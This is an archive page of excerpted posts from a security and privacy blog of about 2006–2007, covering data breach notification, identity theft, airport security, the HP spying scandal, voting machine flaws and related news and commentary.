Two in the Washington Post today: “Secret [FISA] Court to Govern Warrantless Taps” and “Vast Data Collection Plan Faces Big Delay:” In a report to Congress to be released today, the Treasury Department concluded that the program was technologically feasible and has value, but said it needs to determine whether the counterterrorism benefit outweighs banks’ […]

 

"Not Having a Discussion About What I'm Buying? Priceless."

There’s a fascinating article in Sunday’s New York Times, “Money Doesn’t Talk.” The money quote: Through her store, Pesca, Ms. Azizian has earned her financial independence, but to avoid the disapproval of her husband of 27 years, she adopts a low profile by using cash. “His tastes aren’t as expensive as mine, and he doesn’t […]

 

Security Through Obscurity, The Next Big Thing

PCMesh, a Canadian company, has something Better Than Encryption. Encrypted files are still visible on the hard drive. This makes them vulnerable to attack from anyone who is interested enough in the content of the files to spend time trying to decipher them. And with more and more hackers intent on defeating modern encryption algorithms, […]

 

New Year's Resolution Dept. — Protecting Against Identity Theft

It’s the MLK Day holiday weekend. That means that one’s headache has subsided to the point that one can no longer hear one’s nose hair growing, and the cat is padding rather than stomping. It also means that it’s time for New Year’s Resolutions! If yours is to get better control over your information privacy, […]

 

Report: Approaches to Security Breach Notification

The Canadian Internet Policy and Public Interest Clinic at the University of Ottawa has published a report entitled Approaches to Security Breach Notification[pdf]. From the Introduction: This White Paper considers the need for an explicit obligation in Canadian privacy law to notify affected individuals of a breach in an organization’s security that places those individuals’ […]

 

New York Times on DRM

“Want an iPhone? Beware the iHandcuffs” says The New York Times in today’s edition of “Your Money”. Unfortunately it doesn’t really say much about the iPhone and crippleware beyond saying that it will be limited in music playing in effectively the iPod. However the article does a very nice job of covering the state of […]

 

Going the extra mile

As a control against identity theft, firms operating on-line often send snail mail confirmations to their customers when such things as site passwords, beneficiaries, or customer addresses have been changed. This allows the customer to review such changes and catch any that may have been unauthorized. I was the recipient of two such pieces of […]

 

Credit Card Data Over AOL IM

From the files of “too good to make up”, DavidJ.org reports a story from a couple of years ago about his credit card data being sent over AOL Instant Messenger. Essentially he bought some merchandise at a shot which didn’t have a point of sale terminal so the clerk was IMing all credit card data […]

 

Full Disclosure == Torture

Or so says the Mogull over at Securosis. This particular section sums up my own feelings about the necessity of full disclosure quite well. I think we need full disclosure as a tool in our arsenal, and that most of the researchers dropping these vulnerabilities think they’re doing good, but full disclosure needs to be […]

 

A Pleasure Doing Business With You!

The BBC reports that the United Kingdom’s 1945 war debt to US [is] ‘almost paid’ and [was] paid off at the end of last year: The final payment of £45m will be made by the 31 December, meeting a 1945 obligation to repay the debt in full. In unrelated news, I’m told that neither the […]

 

Bay Area Security Incident Exercise

For those who are located in the SF Bay Area (or will be there on February 21st), the Silicon Valley ISSA Chapter is hosting a one day mock security incident exercise. The goal of the exercise is to explore how different organizations and industries must work together to respond to events based on their organizational […]

 

FTC Accepting Comments on ID Theft

The President’s Identity Theft Task Force announced that it is seeking public comment on various possible recommendations to improve the effectiveness and efficiency of the federal government’s efforts to reduce identity theft. The Task Force is chaired by Attorney General Alberto R. Gonzales and co-chaired by Federal Trade Commission Chairman Deborah Platt Majoras and participants […]

 

Secret Laws, Obnoxious Laws … No Law's Not Looking So Bad

First, from 27B/6, we learn that “Supremes Won’t Hear Secret Law Challenge,” and that the administrative agencies such as TSA are free to propogate laws and regulations we can’t see or challenge. Second, via Kansas City Newzine, we learn about the totally screwed up set of rules which are ‘REAL ID,’ featuring this chilling quote: […]

 
 

Insuring Against Data Loss Losses

Matt Hines reports on a growing market for corporate insurance, responding to concerns about breach laws, in “Dark Day Planning: Insuring Against Data Loss:” As a result of the widening impact of data losses, AIG has seen its business of providing insurance for potential corporate security failures shift increasingly toward protection for privacy-related risks. Another […]

 

A Request

My latest request for documents under New York State’s freedom of information law was just responded to. There are 1289 pages of documents covering the period 6/2006 to 12/2006. By way of comparison, my two previous requests covered the period 12/2005 to 5/2006, and yielded 400 pages or so. The nice folks in NY made […]

 

Hmmm…Breach Notification…Australia…

So there’s an article in ZDNet Australia, “Establish a strategy for security breach notification.” All well and good, but Australia doesn’t have a breach notice law. (As far as I know.) So all you ‘new normal’ skeptics, who don’t believe me that standards are changing ahead of laws…why did a competent journalist writing for editor […]

 

Five Things You Don't Know About Me

Dear Bob, You may think I’ve been ignoring your post, but I’ve been trying to decide how to approach it. This morning, courtesy of Scoble, I found Hugh McLead’s post on the subject: I dislike you intensely. I love it when bad things happen to you. When your name is mentioned I immediately try to […]

 

I knew those Bratz were trouble

As if Barbie isn’t a bad enough role model, it seems that at least one Bratz doll came complete with actual marijuana as an after-market accessory. The unlucky recipient’s mom quickly called 911 when she found the contraband packaged with the doll she received in the mail, having thought it was an identical doll she […]

 
 

Trusting Privacy Promises

Michael Arrington writes at Techcrunch about a former law firm, all of whose records are going to be opened to the public: Brobeck, Pleger & Harrison LLP was a well known law firm in silicon valley during the first Internet boom. They had thousands of startup and public company clients and handled all aspects of […]

 

Would You Do Me A Favor?

Nick Owen posts his favorite blog posts of the year. I have my favorites, but I’m curious. What are yours? What do you remember? We’d love to know.

 
 
 

DHS says one thing, does another. Film at 11.

The Department of Homeland Security (DHS) Privacy Office conducted a review of the Transportation Security Administration’s (TSA) collection and use of commercial data during initial testing for the Secure Flight program that occurred in the fall 2004 through spring 2005. The Privacy Office review was undertaken following notice by the TSA Privacy Officer of preliminary […]

 

Radical Transparency and Society

In “Radical Transparency to improve resilience,” John Robb posts about Chris Anderson’s ‘radical transparency:’ Think about how these tactics can be applied to societal resilience: Show who we are. Show what we are working on. “Process as Content.” Privilege the crowd. Let readers decide what is best (aka: wisdom of the crowd) Wikify (this another […]

 

That wasn't so bad after all…

There’s an article in Wall Street and Technology, “When Risk Managers Cry Wolf.” It opens: Avoiding “reputation risk” is a common justification for increasing security measures, protecting customers’ financial information and reporting security breaches in a timely manner. But now more than 18 months after the big ChoicePoint incident when 163,000 bogus accounts were created […]

 

Akaka-Sununu Bill Repeals Key Aspects Of The Real ID Act

Daniel Akaka and John Sununu have introduced a bill to repeal title II of the Real ID Act. From the press release: The Identification Security Enhancement Act (S. 4117) replaces REAL ID with language from the Intelligence Reform and Terrorism Prevention Act of 2004 (P.L. 108-458), which took a more measured approach in mandating tougher […]

 

Aspen Privacy Breach

The Wall Street Journal reported yesterday that “Stars Find Privacy Breached In Aspen by Phone Book” (behind paywall, sorry). According to the Journal: When the Yellow Book directory for Aspen, Colo. came out recently, residents of this ultra-chic ski town found it contained more than the usual list of local bars, hair salons and ski […]

 

Million Dollar Blog Post

My friend Austin Hill has put up the Million Dollar Blog Post. They, and their sponsors, will donate up to a million dollars to charity, at $1 per comment. I think charity is tremendously important. I’ve been lucky enough to have a set of skills that are well rewarded in today’s world. (I’m reminded of […]

 

Gifts for the Cryptological Mind

Cryptological in this case meaning those who like thinking about the hidden. Authorized Da Vinci Code Cryptex from The Noble Collection. It’s very nice, made of good, solid brass. It avoids many combination lock issues. I tried some obvious ways you can cheat a letter from such a device and it was well-made enough that […]

 

Breach Bills, and the Role of Encryption

In Grant Gross’s IDG article, “VA Security Breach Bill Criticized by Cybersecurity Group,” CyberSecurity Industry Alliance General Counsel Liz Gasster is quoted extensively: The Veterans Benefits, Health Care, and Information Technology Act, largely focused on veterans’ health-care programs, includes a section on information security requiring the VA to report data breaches of any “sensitive” personal […]

 

Infosec Incentives for People

So there’s been discussion here recently of how to motivate security professionals to do better on security. I think it’s also worthwhile to look at normal people. And conviniently, Bruce Schneier does so in his Wired column this month, “MySpace Passwords Aren’t So Dumb.” He looks at how MySpace users do in their passwords versus […]

 

One passport, please…

hold the RFID. I just got my US passport renewed, and I was pleasantly surprised when it came back Old Skool — no RFID.  I’m happy…until 2016 anyway.

 

Introducing Mordaxus

Mordaxus is a longtime former cypherpunk with interests in anonymity, security and usability. He’s been involved in some of the biggest brands in security, and has entertaining stories about some of the most interesting events in information security history. He can’t tell those without giving away his secret identity, and so will focus on adding […]

 

Wikid cool thinking on Infosec incentives

First, assume that you believe, as discussed in Gordon & Loeb’s book Managing Cybersecurity Resources: A Cost-Benefit Analysis and discussed here that an organization should spend no more than 37% of their expected loss on information security. Second, assume that you agree with the Ponemon Institute on the cost of business data breaches: $182 per […]

 

Information Exposed For 800,000 At UCLA

Apparently it’s Identity Theft Tuesday here on Emergent Chaos. CNN reports that a “Hacker attack at UCLA affects 800,000 people”, which includes current and former faculty, students and staff. The initial break-in was apparently in October of 2005 and access continued to be available until November 21st of this year. I am stunned that it […]

 

Quotable quotes

History teaches you that dictators never end up well. Augusto Pinochet, November 25, 1915 – December 10, 2006

 

Medical Privacy

There’s a really interesting story in the New York Times last Sunday, “Health Hazard: Computers Spilling Your History.” Money quote: Some patients are so fearful that they make risky decisions about their health. One in eight respondents in a survey last fall by the California HealthCare Foundation said they had tried to hide a medical […]

 

So I’m Idly Curious…

“Please put your bra in the bin,” at Flyertalk: items used to augment the body for medical or cosmetic reasons such as mastectomy products, prosthetic breasts, bras or shells containing gels, saline solution, or other liquids; and, … 1. Separate these items from the liquids, gels, and aerosols in your quart-size and zip-top bag. 2. […]

 

Farts on a plane!

Or, “It’s not the crime, it’s the coverup”. It may be one problem airline security officials never envisioned — a passenger lighting matches in flight to mask odors from her flatulence. The woman’s actions resulted in an emergency landing on Monday in Nashville of an American Airlines flight bound for Dallas from Washington, D.C., said […]

 

Rocket Powered Mini

Can a rocket powered mini match the distance of an olympic ski jumper? Watch and see. For a full explanation of the results read Popular Science’s breakdown of the experiment.

 

Privacy For Hedge Funds

In “Citadel, Sensitive Data, and Plusfunds’ Bankruptcy” Paul Kedrosky looks at the impact of youthful chattiness on an industry: Apparently hedge fund Citadel is trying to purchase data from bankrupt Plusfunds that would detail trading strategies at some of its major competitors. The latter company had run a hedge fund index underlying which were trading […]

 

You Make Me Look Good. Thanks!

In “Our Tax Dollars at Work,” Phil writes: After half an hour I gave up on figuring out how to do my civic duty, and leveraged Adam for some help. He’s my go-to guy for this kind of thing. He has the kind of readership that provides answers in as little as forty earth minutes, […]

 

Security 1.27?

Security 2.0 indeed….. Thanks Illiad…. s/WEB/SECURITY/g Happy Saturday

 

Dear TSA, How Do We Contact Thee?

Phil Schwan, who was able to read to the end of “Homeland Security tracks travelers’ meals” without blowing a gasket, noticed that they said they’d only gotten 15 comments: I tried for 30 goddamn minutes to figure out how to comment. That’s why there are only 15 comments. All I could find was a Privacy […]

 

Radiation

How’d you like to be the person at British Airways who has to write the letter to 30,000 people explaining that they might have been exposed to a radioactive poison while traveling on BA flights? Remarkably, authorities will not confirm that the substance detected was Polonium, yet passengers on the flights are being asked to […]

 

More on Godin and Tufte

There’s another good article on Juice Analytics, “Godin, Tufte, and Types of Infographics:” (hey, guys, where are the author names? Author names only show in RSS, not the web page?) Tufte frustrates on a number of levels. He is enormously influential in business. Businesses send people to his seminars and they come back energized with […]

 

Fanning the flames, security metrics style

Amidst the to and fro over insider v. outsider threats, whether security metrics can be “gamed”, and so on, and in recognition of the best buddies that security geeks and economists have now become, I offer the following.  The saying often quoted from Lord Kelvin (though the substance, I believe, ismuch older) that “where you […]

 

Small Bits of Chaos

Michael Giest is covering Canadian Parliamentary hearings over that country’s privacy law in “PIPEDA Hearings – Day 01 (Industry Canada)” “PIPEDA Hearings – Day 02 (B.C. Privacy Experts)” Bakelblog vents about the petty tyranny of immigration bureaucrats in “Welcome to America, Fuckwads!” Alec Muffet has interesting and detailed comments about the broken security of the […]

 

Banksy Again

Or how museum security is like information security. Or as Sivacracy put it “Involuntary Art Acquisitions”. Call it what you will, but in all cases it highlights the fact that most security programs be they physical or information focused, tend to be unidirectionally focused. In the case of museums, it is to ensure that nothing […]

 

Happy Geeky Thanksgiving

Hey everyone, it’s time to celebrate Thanksgiving here in the U.S. Or in the words of Anya, engage in “ritual sacrifice with pie.” If pie isn’t your thing, perhaps cookies are. kung-foodie points us to Joseph Hall’s Ubuntu and

 

England and Wales to fingerprint motorists at traffic stops

Via the Beeb: Drivers who get stopped by the police could have their fingerprints taken at the roadside, under a new plan to help officers check people’s identities. A hand-held device being tested by 10 forces in England and Wales is linked to a database of 6.5m prints. Police say they will save time because […]

 

Selling Security?

Last week, Martin McKeay responded to RaviC’s thougthful discussion of security as a core competence by saying: I don’t think any business is going to buy into security as a core competence unless you can demonstrate to management that they’ve lost business directly because of a lack of security. And even then, it’s an incident […]

 

On Awareness

Last week, Rich Bejtlich posted his common security mistakes to TaoSecurity. His points are all excellent and well thought out, however, I would add one more item to his list: Awareness. It is very in vogue to say that user education must be eradicated, will never work and is one of the dumbest ideas in […]

 

Carole King said it best

“It’s too late, baby” Yeah, I’m dating myself, but Tapestry was huge, and she and Goffin had some serious songwriting chops. Anyway, the “it” about which it’s too late is, yes, a relationship. An important relationship. A relationship which, while admittedly not exclusive, is “open” in a hopefully honest, fulfilling, respectful way. That relationship is […]

 

SANS Top 20 has competition!

SANS has just released their annual Top 20. I won’t bother linking to it — Google knows where to find it, and if you’re reading this blog, you probably do too. Anyway, it seems like the SANS people have a bit of competition. Check out this list: Failing to assess adequately the vulnerability of its […]

 

Bag Matching and Lost Bags

Every now and then, it seems like TSA can do something right. I’ll let you know. In the meantime, the New York Times tells us that “Frustration Grows at Carousel as More Baggage Goes Astray:” The Transportation Department reported that 107,731 more fliers had their bags go missing in August than they did a year […]

 

Vulnerability Game Theory

So a few days ago, I attended the Vista RTM party. I spent time hanging out with some of the pen testers, and they were surprised that no one had dropped 0day on us yet. These folks did a great job, but we all know that software is never perfect, and that there are things […]

 

New Zealand to literacy: "l8r!"

Via CNN: WELLINGTON, New Zealand (AP) — New Zealand’s high school students will be able to use “text-speak” — the mobile phone text message language beloved of teenagers — in national exams this year, officials said. Text-speak, a second language for thousands of teens, uses abbreviated words and phrases such as “txt” for “text”, “lol” […]

 
 

Better Dead than Red?

Via the Beeb, writing about a county board election in South Dakota: Marie Steichen, who died of cancer in September, beat a Republican rival by 100 votes to 64 and became a county commissioner posthumously. The election list closed on 1 August, but Ms Steichen’s name was kept on the list for Tuesday’s election. Voters […]

 

Popping pills

Breach disclosure foes say that notifying those whose personal information may have been revealed in many breaches is costly, and often not commensurate with actual risk to consumers. A well-written example [pdf] can be had from the Political and Economic Research Council, which reports that direct notification costs are about $2.00 per notified person. So, […]

 

Mike Howard beats me to the punch

His posts on “Microsoft hosts OEM partners for a crash-course in SDL (Day Two)” and “Microsoft hosts OEM partners for a crash-course in SDL (Day Three)” cover much of what I wanted to say: My biggest observation was these guys were utterly engaged, and by that I mean writing copious notes and asking some very […]

 

Talking to OEMs

My co-worker Mike Howard posted “Microsoft hosts OEM partners for a crash-course in SDL (Day One)” As part of our ongoing SDL efforts, we are hosting a 2.5 day event here in Redmond for our OEM partners – over 50 senior technical experts from the biggest names in the computer industry. Out of respect for […]

 

Participatory Security

Cutaway, over at Security Ripcord provides us with an alternate take on the fact that security needs to understand the business constraints and goals of the organization. He (She?) quite rightly points out that security is a part of the “Service and Support” Group. He has two essential points: I have been hearing a lot […]

 

Topology Editors Resign En Mass

The New York Sun reports, “A Rebellion Erupts over Journals of Academia:” “Elsevier’s prices are very high,” said an emerita mathematics professor at Barnard College, Joan Birman, who resigned a few years ago from the board of an Elsevier journal, Topology and Its Applications. She said her feeling was, “We do the work, we check […]

 

Public Library of Science and The Journal System

Dave Weinstien has a really interesting article, “PLOS – Open Access science:” PLoS has an “intrinsic tension” [Hemai Parthasarathy] says because most of the people who started the journal don’t believe in elite publishing. “We think it’s wrong for tenure committees to pass the buck” to the editors of the top-tier journals. That’s why they’ve […]

 

How to Treat Customers

My friend Austin Hill has a new blog, Billions With Zero Knowledge. He’s got a really good post up “Crowdsourcing or Community Production – An Interview with Hugh McGuire from Librivox.” What’s most interesting to me is how new companies are trying to tap into customer enthusiasm to build not only value for their customers, […]

 

Happy Halloween

                   Sometimes it’s OK to take candy from strangers.

 

Giant Waves

Chandler Howell has a great post about giant waves. He quotes extensively from “Monster Rogue Waves” at Damninteresting: More recently, satellite photos and radar imagery have documented the existence of numerous rogue waves, and it turns out that they are far more common than previously thought. During a three-week study in 2001, radar scanning detected […]

 

On Printing Boarding Passes, Christopher Soghoian-style.

Yesterday, I blogged about Christopher Soghoian’s print your own boarding pass tool. Quite a few people (including the FBI) are taking the wrong lesson from this. Wrong lessons include “we shouldn’t be allowed to print boarding passes,” “we should check ID at the gate,” and “Christopher Soghoian should be arrested.” The right lesson is that […]

 

Risk Management Redux

Earlier this week, Mike Rothman took a swipe at Alex Hutton’s What Risk Management Isn’t by saying: But I can’t imagine how you get all of the “analysts and engineers to regularly/constantly consider likelihood and impact.” Personally, I want my firewall guy managing the firewall. As CSO, my job is to make sure that firewall […]

 

Congratulations to Counterpane and Bruce Schneier

Even though Chris got the news before me, I wanted to add my congratulations. I was involved in Counterpane very early, and made the choice to go to Zero-Knowledge Systems. I stayed involved on the technical advisory board, and was consistently impressed by the quality of the many Counterpane employees and executives who I met. […]

 

BT buys Counterpane

And so it continues…. Reuters has a few details. Unsurprisingly, Bruce Schneier also has a blog entry up on this.

 

Contactless Credit Cards Cracked

Well calling it cracked implies encryption or some semblance of security of which there is none according to the New York Times. In Researchers See Privacy Pitfalls in No-Swipe Credit Cards we learn that a team of folks from UMass Amherst and EMC/RSA tested a small batch of RFID Credit Cards from Amex, Visa and […]

 

Diebold goes open source

Well, not intentionally. Seems that multiple versions of source code (including the one used to run the 2004 primaries in Maryland) were delivered anonymously to a former legislator who has been critical of Diebold. Note that this is not the same source examined by Avi Rubin, et. al., and found wanting from a security perspective. […]

 
 

Radialpoint Needs People

My friends at Radialpoint are looking for a few great people to help drive their service delivery platform. They need a database development architect, a software architect, and a senior Java developer: These are leadership level positions in a growing company with great financial resources. Each of these team members will have the chance to […]

 

Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach

I’m pretty excited that an article, “Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach” is in the November MSDN magazine. The theme of the magazine is “Security Fundamentals.” The article that I wrote with Shawn Hernan, Scott Lambert, and Tomasz Ostwald talks about how we threat model our products at Microsoft. I’m happy […]

 

Analogies

So Chandler offers up “The Last Security Analogy You’ll Ever Need.” I’d like to pile on: Analogies are like fish. Sometimes they just don’t make sense.

 

Certification Shmertification

So it seems that certifications are again in the press. This time over at SC Magazine. Last month, SC ran “Does testing matter?“. I say ran as opposed to ask, because really the article was a page long advertisement for the various certifications with most of the quotes being from the various organizations who sponsor […]

 

Measurement

There are a bunch of ways to estimate how many people have died in the Iraq war.  One is to keep track of news stories and official reports of combatant and civilian deaths, and add them up. Another is to employ the tools of epidemiology and demography.  Until now, we’ve had essentially only the former […]

 

Real ID Will Waste $11 Billion

What could you do with $11 billion? How many ways could we make the world a better place with that money? I know! Let’s spend it on a national ID card! The $11 billion figure comes from the National Conference of State Legislatures, and doesn’t include wasted time by productive members of society. On the […]

 

New, Non-Obvious, and umm, Useful?

Orin Kerr has an interesting post over at Volokh Conspiracy, “Government Responds in United States v. Ziegler,” which contains this interesting bit: But that’s simply not how the Fourth Amendment works. The “reasonable expectation of privacy” test is actually a system of localized rules: the phrase is simply a label, and what it actually means […]

 

"Reservoirs of Data"

Danielle K. Citron has put a new paper on SSRN, “Reservoirs of Danger: The Evolution of Public and Private Law at the Dawn of the Information Age.” It is highly readable for the lay audience, and lays out (what I think is) a strong case for strict liability in personal data breaches. The abstract of […]

 

BOOM, there it is

If, as is being suggested, North Korea has tested a nuke, things will be getting mighty interesting. I don’t know what to make of it, frankly. Update, 2350 CDT: Looks increasingly like there was, indeed, a test.

 

No Expectation of Privacy

Here in the U.S., one of our Old Order Amish communities has recently suffered an infamous crime — the murder of several schoolchildren.  Interest in this case has been high.  Naturally, the public’s right to know has been ably served, as journalists took plenty of funeral photographs, despite the fact that the Amish, on strict […]

 

Information Warfare

As long as I have been lecturing on security I have used the “Threat Hierarchy” that lists threats in ascending order of seriousness. It goes like this: 1. Exploratory hacking 2. Vandalism 3. Hactivism 4. Cyber crime 5. Information Warfare It turns out that this hierarchy is also a predictive time line. Obviously we are […]

 

The Canadian Privacy Landscape

There’s a really interesting article at Blogging on the Identity Trail, “Bouquets and brickbats: the informational privacy of Canadians:” In the course of our investigations, I frequently found myself reflecting on two broader questions: first, I wondered how best law could protect the personal information of Canadians—and by extension the privacy of Canadian citizens—in the […]

 

RSS Feeds

Thanks for the emails. We’re aware of some problems with the RSS and comments feeds, and will be working through them asap. [Update: Should be fixed, as of Oct 05, 2006 at 05:01:36PM -0400. cw] [Update 2: When Chris said “fixed,” he was of course using the term in the sense of a Vegas prize […]

 

The Value of Location Privacy

There is a Workshop on Privacy in The Electronic Society taking place at the beginning of November. We (George Danezis, Marek Kumpost, Vashek Matyas, and [Dan Cvrcek]) will present there results of A Study on the value of Location Privacy we have conducted a half year back. We questioned a sample of over 1200 people […]

 

Less than zero-day

[This was prepared the morning of October 1, but not posted because I expected more to come of the story rather quickly. It now appears that 1. is true.] OK, so at Toorcon a couple of guys — one of whom works at SixApart — reported on a Firefox 0day. These gents claim to have […]

 

Marty: It's All About Transparency

Marty Roesch writes “Miracle Weapon in the War on Terror Discovered!.” You’d think he’d have more sympathy for the need for standardized transports while doing high-speed inspection.

 

2006 Underhanded C Contest

long unsigned int maxwordsize(char *inputFromStdIn) { long unsigned int tmpwordsize=0,maxword=1,i; for (i=0; i

 

Extra! Extra! Read Nothing About It! (Latest on Apple V. Maynor)

In “SecureWorks Backs Out of Macbook Demo,” Brian Krebs writes: David Maynor, the SecureWorks researcher who was set to demonstrate how wireless driver flaws could be used to compromise an Apple Mac laptop, suddenly has been yanked from the ranks of Toorcon presenters. At around 12:50 p.m. PT, SecureWorks issued the following press release: “SecureWorks […]

 

TRUSTing Mary Ann Davidson

Yesterday, Mary Ann Davidson had a fascinating post about the classics of Western literature. As usual for Mary Ann, the apparent basis of the post is really just exposition for her main point. In this case, the thrust of her post is the need for developers to have more training in secure coding at the […]

 

Words to live by

No free man shall be seized or imprisoned, or stripped of his rights or possessions, or outlawed or exiled, or deprived of his standing in any other way, nor will we proceed with force against him, or send others to do so, except by the lawful judgement of his equals or by the law of […]

 

Which Stupidity to Stop?

Stupid bills before legislatures seem to be a target rich environment which is to say, its hard to even say where to start. So allow me to offer a suggestion: California’s SB768 will slow RFID stupidity. Take a look at EFF’s fact sheet, and then, if you’re in California, call your local Governator, and tell […]

 

Ed Felten's Testimony

Ed Felten, who has been doing research into security issues with Diebold’s voting machines, is testifying today at a House Administration Committee hearing. He’s posted his written testimony on his website. Check it out. [Edit: Corrected the spelling of Ed’s name.]

 

Breach Datasource Design Criteria

 Most readers of these words are probably familiar with at least one of the lists of data breaches commonly referenced in the media and in specialized blogs.  Among these are Attrition.org’s Dataloss, and Privacyrights.org’s Breach Chronology.  The ID Theft Center also maintains a list (available, it seems, only as a PDF), and various academic researchers […]

 

Worse Than Choicepoint: The FTC?

So part of Choicepoint’s settlement with the FTC was a $5m fund to compensate their victims. Now, there were 167,000 victims, of whom 800+ had their identities abused by fraudsters. None have gotten any money: Jessica Rich, assistant director of the FTC’s division of privacy and identity theft, said in a statement released to AP […]

 

International Breach Notices: The Future Is Unevenly Distributed

So said William Gibson, and it is as true in breach notices as it is anywhere else. While only 34 US states have laws requiring these notices, we see organizations around the world sending them. They resonate as the right thing. Acknowledging and apologizing for your mistakes is powerful. (Hey, someone should mention that to […]

 

Breach Tidbit

One of the things people would like to find out is how likely it is that improperly-revealed personal information will be used to commit real fraud. ID Analytics has done some research which they interpret as suggesting that even with focused attacks, where the bad guy is going after SSN and account information, the probability […]

 

Darn kids! Get off my lawn!!

“Until Solaris became open, students were only interested in Solaris for the same reason they were interested in NextStep Unix — because it was this arcane, old-fashioned thing,” said Asheesh Laroia, a graduate student in computer science at Johns Hopkins University. Via NetworkWorld.

 

Stick a fork in her…

..’cause she’s Dunn! What’s the over/under on how long Hurd lasts? Image credit: progodess

 

10-second MBA, por favor?

I have read repeatedly, most recently at Bejtlich’s blog, that with the IBM-ISS and now Secureworks/LURHQ deals, Counterpane “must” be looking to get bought out. Why? As with management consultancies, could there not be room for a boutique that does one thing really well? Help me out, here.

 

Breach Data

I just received a response to my second Freedom of Information request to the state of New York. I’ll report on this more deeply soon, but in the spirit of breach analytics week, I wanted to throw out a couple of things, based on an extremely superficial examination of the approximately 285 pages I received, […]

 

HP: The Kind of Security Theater We Like To Watch

This story just keeps getting more entertaining. “HP targeted reporters before they published.” They tried to install spyware on target’s computers, as CNET reported in “HP Spying More Elaborate Than Reported.” They engaged in physical surveillance of targets, as reported by the Washington Post in “Extensive Spying Found At HP.” And the Post reports that […]

 

CfP: 19th Annual FIRST Conference

The Forum of Incident Response and Security Teams (FIRST) has put out a call for papers for its nineteenth annual conference.  The theme for 2007 is “Private Lives and Corporate Risk: Digital Privacy – Hazards and Responsibilities”. Full details at: http://www.first.org/conference/2007/call_for_papers.html FIRST 19th Annual Conference, June 17 – 22, 2007, Melia Seville hotel, Seville, Spain […]

 

Emergent Breach Research

I talk about research and next steps, but what do I mean? We’re starting to see academics taking a serious look at the data sets we’ve accumulated here and at Attrition, and that’s awesome. I want to see more papers like: “Notification of Data Security Breaches,” by Paul M. Schwartz and Edward J. Janger, forthcoming […]

 
 

This Post Brought to You By The Number 3, and The Letters and S and L

There’s a fascinating discussion of the intersection of cryptanalysis, specification and flexibility, all of it stemming from yet another SSL attack by Bleichenbacher. The best posts are over at Matasano: Many RSA Signatures May Be Forgeable In OpenSSL and Elsewhere Mozilla Falls to RSA Forgery Attack RSA Signature Forgery Explained (with Nate Lawson) – Part […]

 

Because That's Where The Money is: Ethan Leib's ID Theft

Ethan Leib blogs about being the victim of a fraudster: An individual in California posing as “Ethan Leib” (with phony ID to match) has been walking into branches of my bank across the state and taking all my money — despite a fraud alert on my accounts. They even stole thousands from my 6-week old […]

 

Metricon 1.0 Papers and Digest Available

Metricon 1.0 papers and a remarkable digest are available at the security metrics web site. Dan Geer took extensive notes, and has turned them into a very useful document for those who weren’t able to make it.

 

$50 Milion for Violating Driver's Privacy in Florida

$50 Million Verdict for Violating Drivers’ Privacy in FL A Florida bank was required to pay $50 million in a class-action settlement resulting from violations of federal privacy law. Fidelity Federal Bank & Trust purchased 656,600 names and addresses from the Florida DMV for use in direct marketing. The purchase violated the Drivers Privacy Protection […]

 

Does anyone remember laughter?

Via Stupid Security, I learned of a gent whose T-shirt was deemed a security risk because it showed crossed pistols and could upset passengers. He was allowed to board the plane, but only after turning his shirt inside out. Good thing he wasn’t wearing a Zeppelin shirt. I guess Bush would be OK (ironic, given […]

 

Dunn Done

See “Leak Scandal Costs HP’s Dunn Her Job.” [Update: It’s only her chairwoman job. Somehow the board members at HP don’t see action that leads to criminal investigation as all that bad. See Paul Kedrosky’s “HP Splits the Boardroom Baby,” which is an awful title for a great article. Solomon’s splitting of the baby was […]

 

HP Spying on Their Board

If you’ve not been paying attention, HP’s Chairwoman hired private investigators who lied their way to the phone records of board members and journalists. HP then lied to the SEC about why Silicon Valley eminence Tom Perkins resigned from the board, and Mr. Perkins, being a standup guy, called them on it. If you haven’t […]

 

I couldn't have said it better, myself

Pseudonymous contributor “DK”, of Josh Marshall’s blog expresses several worthy thoughts about national character with a brevity and nuance I envy: OK, I’ll admit to a bias here. I think the Netherlands is one of the best places on the planet. They have our entrepreneurial spirit, but with good taste. Like us, they have completely […]

 

Compliance for auditors?

The frequent loss of laptops and data disks by outside auditors in recent months has caused me to think about best practices for controlling auditors. The latest case involved the laptop of the auditor for Wellsfargo Bank. The laptop was stolen from the trunk of the auditor’s car and contained confidential information on bank employees. […]

 

Are they stupid, or just lying?

On the recent House of Representatives vote to ban the slaughter of horses:  “It is one of the most inhumane, brutal, shady practices going on in the U.S. today,” said Rep. John Sweeney, R-N.Y., a sponsor of the ban.     Sweeney argued that the slaughter of horses is different from the slaughter of cattle and chickens […]

 
 

Congratulations to Mozilla

EWeek has the story: Window Snyder has joined Mozilla as Security Chief. Congratulations all around. PS: Just when Window and I were gonna live in the same city, again, too. Bugger. PPS: Apparently, it’s from Mike Schroepfer’s blog post.

 

Wells Fargo to laptop-losing auditor: buh-bye

Via David Lazarus, writing about yet another lost laptop, this one belonging to an an outside auditor working for Wells Fargo: “The auditor had this information because we are required by the Internal Revenue Service to have our health plans audited by independent, qualified public accountants,” said Julia Tunis, a Wells spokeswoman. “The auditor is […]

 

If I want your opinion…

…I’ll beat it out of you: President George W. Bush’s proposal for trying suspected terrorists captured overseas would allow the use of evidence obtained by coercion and let judges bar defendants from hearings where classified evidence is discussed, a Senate Republican aide who has been briefed on the plan said. Or, as Firesign Theatre put […]

 

ID Theft as a Not-For-Profit Activity

The New York Times has an article, “Some ID Theft Is Not for Profit, but to Get a Job,” about immigrants using other people’s SSNs so they can get jobs, and the impact that this has (because of the databases that run our lives): “All that was happening was that the illegal alien who had […]

 

The "Seal" that Doesn't

From this photoessay, it appears that the seal Diebold places on its electronic voting machines doesn’t do a darn thing.  It is possible to remove the card from which the thing boots, and replace it with one of your choosing, leaving no trace — the seal itself remains unchanged.  Elapsed time, a bit over four […]

 

Google whitewash

The Tom Sawyer kind, that is, known formally as Google Image Labeler: You’ll be randomly paired with a partner who’s online and using the feature. Over a 90-second period, you and your partner will be shown the same set of images and asked to provide as many labels as possible to describe each image you […]

 

Data Dilemma

Various folks at Northwestern’s Medill School of Journalism have done some great work, which they call Data Dilemma: Privacy in an Age of Security. I was led to this by various stories about the US Department of Education feeding information on financial aid applicants to the DHS for five years without bothering to inform those […]

 

Choicepoint, while we're correcting errors

A few weeks back, I corrected an error in a post about Choicepoint. Choicepoint also corrected an error, see “Job seeker loses opportunity after inaccurate background check” for details: “Well, first they said, ‘Something was wrong with your background check,’” she said. “I said, ‘What is wrong with it? What is wrong with my background […]

 

Inconceivable Levels of Destruction

